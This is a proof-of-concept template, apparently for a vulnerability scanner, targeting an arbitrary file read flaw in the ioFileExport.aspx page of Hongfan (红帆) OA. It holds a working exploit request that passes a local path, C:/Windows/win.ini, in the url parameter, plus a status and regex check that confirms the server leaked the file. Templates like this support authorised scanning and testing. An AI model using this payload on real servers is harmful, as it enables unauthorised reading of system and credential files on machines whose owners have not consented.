<DudePoc_Name>红帆 OA ioFileExport.aspx任意文件读取</DudePoc_Name>
<DudePoc_Description>红帆 OA ioFileExport.aspx任意文件读取</DudePoc_Description>
<DudePoc_SetHeader>
GET /iOffice/prg/set/ioCom/ioFileExport.aspx?url=$<AttackCode>$ HTTP/1.1
Host: $<AttackHost>$
User-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36 Edg/113.0.1774.57
</DudePoc_SetHeader>
<DudePoc_SetData>

</DudePoc_SetData>
<DudePoc_VerifyStatusCode>200</DudePoc_VerifyStatusCode>
<DudePoc_VerifyData>^(?=.*?extensions)(?=.*?fonts).*?$</DudePoc_VerifyData>
<DudePoc_VerifyFile></DudePoc_VerifyFile>
<DudePoc_AttackCode>C:/Windows/win.ini</DudePoc_AttackCode>
